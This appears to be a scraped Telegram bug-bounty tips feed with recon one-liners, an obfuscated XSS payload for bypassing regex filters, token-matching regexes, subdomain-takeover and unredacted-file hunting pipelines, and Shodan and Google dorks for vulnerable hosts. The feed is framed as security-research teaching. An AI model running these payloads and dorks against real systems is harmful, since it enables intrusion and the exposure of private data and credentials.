Find sensitive files using Wayback
#bugbountytip #bugbounty #bugbountytips
waybackurls 123.com | grep - -color -E "1.xls | \\.tar.gz | \\.bak | \\.xml | \\.xlsx | \\.json | \\.rar | \\.pdf | \\.sql | \\.doc | \\.docx | \\.pptx | \\.txt | \\.zip | \\.tgz | \\.7z"
#bugbountytip #bugbounty #bugbountytips
1๐13โค4๐ฅ3
a XSS payload with Alert Obfuscation, for bypass Regex filter
#infosec #cybersec #bugbountytip
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
#infosec #cybersec #bugbountytip
โค11๐6
Reduce Noise in Burp Suite with This Simple Trick! ๐ฅ
๐ก Just add the following patterns in Burp Suite under Proxy > Options > TLS Pass Through:
If you have any other filters to do share, drop it on comments!
๐ก Just add the following patterns in Burp Suite under Proxy > Options > TLS Pass Through:
.*\.google\.com
.*\.gstatic\.com
.*\.googleapis\.com
.*\.pki\.goog
.*\.mozilla\..*
If you have any other filters to do share, drop it on comments!
1โค15๐9
AZURE_OPENAI_API_KEY /[a-f0-9]{32}$//ATATT3[a-zA-Z0-9_\-+=]{184,195}$/#CyberSecurity #BugBounty #infosec #BugBountyTools #pentest #bugbountytips
Please open Telegram to view this post
VIEW IN TELEGRAM
๐4โค1
Check for Subdomain Takeover Vulnerabilities
This enumerates subdomains and checks if they resolve. Subdomains that return NXDOMAIN may be vulnerable to takeover if they point to external services.
Replace nasa.gov with your target.
This enumerates subdomains and checks if they resolve. Subdomains that return NXDOMAIN may be vulnerable to takeover if they point to external services.
subfinder -d target.com -silent | while read sub; do host $sub; done | grep "NXDOMAIN"
Replace nasa.gov with your target.
๐12๐ฟ6
Hey everyone!
- Access challenging, real-world environments to hone your skills.- Tackle new labs like Odyssey and Ascension as they roll out.
- Join a community of dedicated hackers pushing their skills to new heights.
Letโs hack and learn together!
Please open Telegram to view this post
VIEW IN TELEGRAM
๐3โค2๐ฅ1
1.Use Katana to scan for document URLs:
katana -u subdomainsList -em pdf,docx | tee endpointsPDF_DOC
2. Filter for potentially unredacted files:
grep -i 'redacted.*\.pdf$' endpointsPDF_DOC | sed -E 's/[-_]?redacted//gi' | sort -u | httpx -mc 200 -sc
This script finds document URLs with "redacted" in the name, strips it out, and checks if the unredacted version is accessible.
Admins often leave these unredacted files online by mistake, making them a high-medium (P3) severity finding for bug bounty programs.
Please open Telegram to view this post
VIEW IN TELEGRAM
1โค14๐5
๐จCVE-2024-51482: A 10/10 Severity Vulnerability Exposes ZoneMinderโs SQL Databases
๐Dorks
HUNTER:/product.name="ZoneMinder"
SHODAN: http.favicon.hash:-1218152116
FOFA: app="ZoneMinder"
๐ฐRefer: https://securityonline.info/zoneminders-cve-2024-51482-a-10-10-severity-vulnerability-exposes-sql-databases/
#ZoneMinder #SQL #hunterhow #infosec #infosecurity #OSINT #Vulnerability
๐Dorks
HUNTER:/product.name="ZoneMinder"
SHODAN: http.favicon.hash:-1218152116
FOFA: app="ZoneMinder"
๐ฐRefer: https://securityonline.info/zoneminders-cve-2024-51482-a-10-10-severity-vulnerability-exposes-sql-databases/
#ZoneMinder #SQL #hunterhow #infosec #infosecurity #OSINT #Vulnerability
2๐7โค2
If youโre new to malware development, this playlist is a solid introduction! It covers:
โข Native API
โข A quick refresher on processes, threads, and handles
โข Syscalls
Check it out here: YouTube Playlist
โข Native API
โข A quick refresher on processes, threads, and handles
โข Syscalls
Check it out here: YouTube Playlist
๐ฅ9
This media is not supported in the widget
VIEW IN TELEGRAM
๐ฟ31๐5๐ณ5
Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png
Please open Telegram to view this post
VIEW IN TELEGRAM
1๐10โค1
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ6๐4โค2
๐2
๐ Google Dorking - SQL Errors
site:[TARGET] AND (intext:"sql syntax near" | intext:"syntax error has occurred" | intext:"incorrect syntax near" | intext:"unexpected end of SQL command" | intext:"Warning: mysql_connect()" | intext:"Warning: mysql_query()" | intext:"Warning: pg_connect()")
๐4
This media is not supported in the widget
VIEW IN TELEGRAM
๐ฟ17โค1๐1๐ฅ1